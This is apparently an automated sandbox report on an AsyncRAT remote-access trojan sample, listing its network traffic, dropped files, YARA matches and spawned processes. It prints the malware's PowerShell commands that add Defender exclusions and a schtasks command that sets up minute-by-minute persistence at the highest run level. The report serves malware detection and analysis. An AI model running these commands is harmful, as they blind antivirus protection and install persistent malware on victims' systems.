Source: powershell.exe, 00000002.00000002.1281766413.0000017A90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1371294998.000001E8AD496000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1545020931.00000224AD0B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1739005715.000001662E002000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: qmgr.db.26.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:

Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49705 version: TLS 1.2

Source: C:\Users\user\Desktop\Or3dzp4vB1.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\Desktop\Or3dzp4vB1.exe

Process information set: 01 00 00 00

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: Or3dzp4vB1.exe, type: SAMPLE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.Or3dzp4vB1.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000000.1230942361.0000000000A82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\0720XW, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Code function: 0_2_00007FFAACCB30C9	0_2_00007FFAACCB30C9
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Code function: 0_2_00007FFAACCBA0E6	0_2_00007FFAACCBA0E6
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Code function: 0_2_00007FFAACCBAE92	0_2_00007FFAACCBAE92
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Code function: 0_2_00007FFAACCB1A66	0_2_00007FFAACCB1A66
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Code function: 0_2_00007FFAACCB9299	0_2_00007FFAACCB9299
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Code function: 0_2_00007FFAACCB3A96	0_2_00007FFAACCB3A96
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Code function: 0_2_00007FFAACCB21D1	0_2_00007FFAACCB21D1
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Code function: 0_2_00007FFAACCB9725	0_2_00007FFAACCB9725
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Code function: 0_2_00007FFAACCB3ABD	0_2_00007FFAACCB3ABD
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Code function: 0_2_00007FFAACCB8034	0_2_00007FFAACCB8034
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Code function: 0_2_00007FFAACCB7839	0_2_00007FFAACCB7839
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAACD730E9	17_2_00007FFAACD730E9
Source: C:\Users\user\AppData\Roaming\0720XW	Code function: 22_2_00007FFAACCD0F08	22_2_00007FFAACCD0F08
Source: C:\Users\user\AppData\Roaming\0720XW	Code function: 22_2_00007FFAACCD0EFA	22_2_00007FFAACCD0EFA
Source: C:\Users\user\AppData\Roaming\0720XW	Code function: 22_2_00007FFAACCD21D1	22_2_00007FFAACCD21D1
Source: C:\Users\user\AppData\Roaming\0720XW	Code function: 22_2_00007FFAACCD1A66	22_2_00007FFAACCD1A66
Source: C:\Users\user\AppData\Roaming\0720XW	Code function: 28_2_00007FFAACCA0F08	28_2_00007FFAACCA0F08
Source: C:\Users\user\AppData\Roaming\0720XW	Code function: 28_2_00007FFAACCA0EFA	28_2_00007FFAACCA0EFA
Source: C:\Users\user\AppData\Roaming\0720XW	Code function: 28_2_00007FFAACCA21D1	28_2_00007FFAACCA21D1
Source: C:\Users\user\AppData\Roaming\0720XW	Code function: 28_2_00007FFAACCA1A66	28_2_00007FFAACCA1A66

Source: Or3dzp4vB1.exe, 00000000.00000000.1230942361.0000000000A82000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameXW0720nocryp.exe4 vs Or3dzp4vB1.exe
Source: Or3dzp4vB1.exe	Binary or memory string: OriginalFilenameXW0720nocryp.exe4 vs Or3dzp4vB1.exe

Source: Or3dzp4vB1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Or3dzp4vB1.exe, type: SAMPLE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.Or3dzp4vB1.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.1230942361.0000000000A82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\0720XW, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: Or3dzp4vB1.exe, v1WK3HQ1SJk.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Or3dzp4vB1.exe, v1WK3HQ1SJk.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Or3dzp4vB1.exe, 6tNVwwp2mfC.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0720XW.0.dr, v1WK3HQ1SJk.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0720XW.0.dr, v1WK3HQ1SJk.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0720XW.0.dr, 6tNVwwp2mfC.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: Or3dzp4vB1.exe, fKaGa2Ywr5w3PQGiDmBI7REAS2.cs	Base64 encoded string: 'HilI89vmEy3+3GvPO/Zq1i4recitTkgorg9ve3fPiOo5zLC01F6N7DLcrdUBCIFx'
Source: Or3dzp4vB1.exe, wgogUBpxJ288HdJhyjxTGDCvz8.cs	Base64 encoded string: 'IHK89lkCtBB5vfur6GRlbIxvTLBLnTcx1AYnCVCaiKLhJZrqCz3kxSPcpbPVQyprS22PuVQX0CV0', 'usPCIXgMSiPCW2a9KH5r8Lrlui1dLmaxzgbQjrrui9qEzj12fO3Lg6SKq0cgL9WDu6NbQbdrJPpW', 'oZsFzgfSzGmhTJnzBuXETJz584ygJMu1zIFGJkEqxt4uGLkuhBun03qvhwUuU7YeVlHjZRCNPXvC', 'QZMc7GRSKwFrVgH9rEPsZq3HEnGstOk3d9dQp2WuqL2TzBUE2wsvhxZGFyQGb1d1heCczfLmUPjV', 'yTGOzf8oR1loLGeyyq1BIlPlRx6YVGYovMX1XfblvqHM9JrnC2w6adckICDABf546KOYUX5VuHwo', 'Sg7K3fHQLanNhYTcpLzXaVah9J9KDxgbL7RZoHoh4YhNhsjhLggIH7fgEs2CjA948WWvyRYCKxsx', 'he1IE8hoZ57VvXji8U8VyKAT9DdsrqfZysr6jYHJdbea0bIzWp5ylgg9bo20uZNaZ5lCbEDANpOC', 'mMueayJXa6lLNBiAZsU2eZ8A2IlSyoUaZTu1AXTPGnB7ooCt3FxNdZCw3QVUAbkl5IxmAmoYxZvf', 'p9Ct1Zb3Fgq1WyOZ1VoBQvuwSA2smbYIeuF3anajE96oILiEjmr2tkHiZfRIeEtWrV8l3NZIN7Ok'
Source: Or3dzp4vB1.exe, 2PiJ0XhLI0Qp8KhHBi10nRhXgt.cs	Base64 encoded string: 'knu9TUqgRYIfI4E5X5wNmdmJT0Cxg3JcvfF7PpCVJO1XIcQs7LPeZaZ9wdhMjA4RFGAKlQZHD8S0', 'kHQiIHSO9Kf99paGMOmuUztOpDxvbesEuyfyaWiI3TJ6jMitsMGkTxc90qvK50wVPXFxT5ncFxlt', 'VlT7z0JCh3YJjqJg608rv8IcqGXGK3zqYKsAcfdQGkCe4y9aYLv6k6QXXNOWizwklryiKXIcFt6h', 'rdSsY44lE3KvEXBc1QQLKcmt2O4KSOuBGNHiMmTz8OuSKtWwzu3MsKPhI9vlJB7bPAGNqT7mvkCM', 'WqGt6trqdPpjPzyE6tvafv1X2Mo5qqywVdXBkacmRM96QjC09Vgzrrp7tGs1e9Zt0MEEFmoNsWU8', 'RnZgapsSPxabwmdeDT16quYvdSJGX8KMh8Kt3EYWiVlWLDNB84wJjVz9ZMb9hJpCOTQA3yi9D709', 'Q70lD5Gfj01jIb86ofJJsDUOhHuXjU23PrVnwQZlWojXd7VIMM6dYZXVG0qFQtr7yRRAOtY14sBd', 'zBG4RDGY8ZDfy6M6DJofyurpVML5QD2hX92W4si3kJJEaRo0jeeBtrrahwUS2CdjZvsjc4T01OXj', 'xFOzls2ynucfnume2FOfVvI0hwIukj7AgMrGZGJL3Rj7m9G1unpV6ebqtW24s4edNMholZ1yQeKo', 'wbnM5bQH73Hk0UufygBhXin212TRwHD0PnrnIrICigLXRYjD5jYVTjLQyq44YB7b90PEoV3Ay2Rg', 'ls71cymv2T1wIkDbRSytIx2a8oOKcMJSohmCOJitocd5Q5NEGC16aqRNzCi4Tr8oPuMiW2UDpxeH', 'JX1rWKPR7N2qLAoW2kyb1e0xdI6bY0UMy71SmjsOUpA5Ip2CZH5RRCWEIWhqN2Wx7iFeTuwfh1rR'
Source: Or3dzp4vB1.exe, jGEa6BYs0PLz0bPSuuML3cXJ6C.cs	Base64 encoded string: 'QhrViXqTfY1h9moGZtOOwQNg7WqV8hrGketiPV0XuOkN81GinEd8iKHg9NS8HxJphAP3OJMMkuzn', 'tmmAwDypQckEBbY9dk9zRvaQpaFwGlKTpNQ167TjPQxlOkiptbZoJLvoYGLZaVTMc43nMgUx76ZT'
Source: Or3dzp4vB1.exe, T8OeMrVcLjImLRIolSzxRmx4be.cs	Base64 encoded string: 'TFbA2nhOqXhoA73fG8a5dOFln337an8NKCsvOHCcJJ18u1DDcv2wzZNNPqQq0PGDAxGs4TQU1yxg', 'QYmrSQgddbPlLLg3QKk1A7Q5tWEegKXrjJS4v57gkJ7DC7JlFphN3ZteJGcdkuTAw58W0tXqOVes', 'iS16qM0NJIZEBuAzFuHT6eV3lIyQsgvBim5hMLBlO9v8RMA6zcqFZJac9ALKHjmVwnpi77YcRAcu', 'm5yO9k7XaSllATXq6wVy6AH8dABHQUzn5DdDsYRaJrCtZy7yn6C1KeQIvH7MQUMhQxvH2S57nNDX'
Source: 0720XW.0.dr, fKaGa2Ywr5w3PQGiDmBI7REAS2.cs	Base64 encoded string: 'HilI89vmEy3+3GvPO/Zq1i4recitTkgorg9ve3fPiOo5zLC01F6N7DLcrdUBCIFx'
Source: 0720XW.0.dr, wgogUBpxJ288HdJhyjxTGDCvz8.cs	Base64 encoded string: 'IHK89lkCtBB5vfur6GRlbIxvTLBLnTcx1AYnCVCaiKLhJZrqCz3kxSPcpbPVQyprS22PuVQX0CV0', 'usPCIXgMSiPCW2a9KH5r8Lrlui1dLmaxzgbQjrrui9qEzj12fO3Lg6SKq0cgL9WDu6NbQbdrJPpW', 'oZsFzgfSzGmhTJnzBuXETJz584ygJMu1zIFGJkEqxt4uGLkuhBun03qvhwUuU7YeVlHjZRCNPXvC', 'QZMc7GRSKwFrVgH9rEPsZq3HEnGstOk3d9dQp2WuqL2TzBUE2wsvhxZGFyQGb1d1heCczfLmUPjV', 'yTGOzf8oR1loLGeyyq1BIlPlRx6YVGYovMX1XfblvqHM9JrnC2w6adckICDABf546KOYUX5VuHwo', 'Sg7K3fHQLanNhYTcpLzXaVah9J9KDxgbL7RZoHoh4YhNhsjhLggIH7fgEs2CjA948WWvyRYCKxsx', 'he1IE8hoZ57VvXji8U8VyKAT9DdsrqfZysr6jYHJdbea0bIzWp5ylgg9bo20uZNaZ5lCbEDANpOC', 'mMueayJXa6lLNBiAZsU2eZ8A2IlSyoUaZTu1AXTPGnB7ooCt3FxNdZCw3QVUAbkl5IxmAmoYxZvf', 'p9Ct1Zb3Fgq1WyOZ1VoBQvuwSA2smbYIeuF3anajE96oILiEjmr2tkHiZfRIeEtWrV8l3NZIN7Ok'
Source: 0720XW.0.dr, 2PiJ0XhLI0Qp8KhHBi10nRhXgt.cs	Base64 encoded string: 'knu9TUqgRYIfI4E5X5wNmdmJT0Cxg3JcvfF7PpCVJO1XIcQs7LPeZaZ9wdhMjA4RFGAKlQZHD8S0', 'kHQiIHSO9Kf99paGMOmuUztOpDxvbesEuyfyaWiI3TJ6jMitsMGkTxc90qvK50wVPXFxT5ncFxlt', 'VlT7z0JCh3YJjqJg608rv8IcqGXGK3zqYKsAcfdQGkCe4y9aYLv6k6QXXNOWizwklryiKXIcFt6h', 'rdSsY44lE3KvEXBc1QQLKcmt2O4KSOuBGNHiMmTz8OuSKtWwzu3MsKPhI9vlJB7bPAGNqT7mvkCM', 'WqGt6trqdPpjPzyE6tvafv1X2Mo5qqywVdXBkacmRM96QjC09Vgzrrp7tGs1e9Zt0MEEFmoNsWU8', 'RnZgapsSPxabwmdeDT16quYvdSJGX8KMh8Kt3EYWiVlWLDNB84wJjVz9ZMb9hJpCOTQA3yi9D709', 'Q70lD5Gfj01jIb86ofJJsDUOhHuXjU23PrVnwQZlWojXd7VIMM6dYZXVG0qFQtr7yRRAOtY14sBd', 'zBG4RDGY8ZDfy6M6DJofyurpVML5QD2hX92W4si3kJJEaRo0jeeBtrrahwUS2CdjZvsjc4T01OXj', 'xFOzls2ynucfnume2FOfVvI0hwIukj7AgMrGZGJL3Rj7m9G1unpV6ebqtW24s4edNMholZ1yQeKo', 'wbnM5bQH73Hk0UufygBhXin212TRwHD0PnrnIrICigLXRYjD5jYVTjLQyq44YB7b90PEoV3Ay2Rg', 'ls71cymv2T1wIkDbRSytIx2a8oOKcMJSohmCOJitocd5Q5NEGC16aqRNzCi4Tr8oPuMiW2UDpxeH', 'JX1rWKPR7N2qLAoW2kyb1e0xdI6bY0UMy71SmjsOUpA5Ip2CZH5RRCWEIWhqN2Wx7iFeTuwfh1rR'
Source: 0720XW.0.dr, jGEa6BYs0PLz0bPSuuML3cXJ6C.cs	Base64 encoded string: 'QhrViXqTfY1h9moGZtOOwQNg7WqV8hrGketiPV0XuOkN81GinEd8iKHg9NS8HxJphAP3OJMMkuzn', 'tmmAwDypQckEBbY9dk9zRvaQpaFwGlKTpNQ167TjPQxlOkiptbZoJLvoYGLZaVTMc43nMgUx76ZT'
Source: 0720XW.0.dr, T8OeMrVcLjImLRIolSzxRmx4be.cs	Base64 encoded string: 'TFbA2nhOqXhoA73fG8a5dOFln337an8NKCsvOHCcJJ18u1DDcv2wzZNNPqQq0PGDAxGs4TQU1yxg', 'QYmrSQgddbPlLLg3QKk1A7Q5tWEegKXrjJS4v57gkJ7DC7JlFphN3ZteJGcdkuTAw58W0tXqOVes', 'iS16qM0NJIZEBuAzFuHT6eV3lIyQsgvBim5hMLBlO9v8RMA6zcqFZJac9ALKHjmVwnpi77YcRAcu', 'm5yO9k7XaSllATXq6wVy6AH8dABHQUzn5DdDsYRaJrCtZy7yn6C1KeQIvH7MQUMhQxvH2S57nNDX'

Source: 0720XW.0.dr, vZUlsyOu66ldYM7KSeC9Zrr9Tp.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0720XW.0.dr, vZUlsyOu66ldYM7KSeC9Zrr9Tp.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Or3dzp4vB1.exe, vZUlsyOu66ldYM7KSeC9Zrr9Tp.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Or3dzp4vB1.exe, vZUlsyOu66ldYM7KSeC9Zrr9Tp.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.evad.winEXE@21/25@1/3

Source: C:\Users\user\Desktop\Or3dzp4vB1.exe

File created: C:\Users\user\AppData\Roaming\0720XW

Jump to behavior

Source: C:\Users\user\AppData\Roaming\0720XW	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8004:120:WilError_03
Source: C:\Windows\System32\OpenWith.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6580:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7396:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8008:120:WilError_03
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Mutant created: \Sessions\1\BaseNamedObjects\08ByrZd1ARUvRLdE
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3540:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6932:120:WilError_03
Source: C:\Windows\System32\OpenWith.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6516:120:WilError_03

Source: C:\Users\user\Desktop\Or3dzp4vB1.exe

File created: C:\Users\user\AppData\Local\Temp\Log.tmp

Jump to behavior

Source: Or3dzp4vB1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Or3dzp4vB1.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\Or3dzp4vB1.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Or3dzp4vB1.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Or3dzp4vB1.exe

ReversingLabs: Detection: 84%

Source: C:\Users\user\Desktop\Or3dzp4vB1.exe

File read: C:\Users\user\Desktop\Or3dzp4vB1.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Or3dzp4vB1.exe "C:\Users\user\Desktop\Or3dzp4vB1.exe"
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Or3dzp4vB1.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Or3dzp4vB1.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\0720XW'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '0720XW'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "0720XW" /tr "C:\Users\user\AppData\Roaming\0720XW"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\0720XW C:\Users\user\AppData\Roaming\0720XW
Source: unknown	Process created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\0720XW C:\Users\user\AppData\Roaming\0720XW
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Or3dzp4vB1.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Or3dzp4vB1.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\0720XW'	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '0720XW'	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "0720XW" /tr "C:\Users\user\AppData\Roaming\0720XW"	Jump to behavior

Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe	Section loaded: msvfw32.dll	Jump to behavior
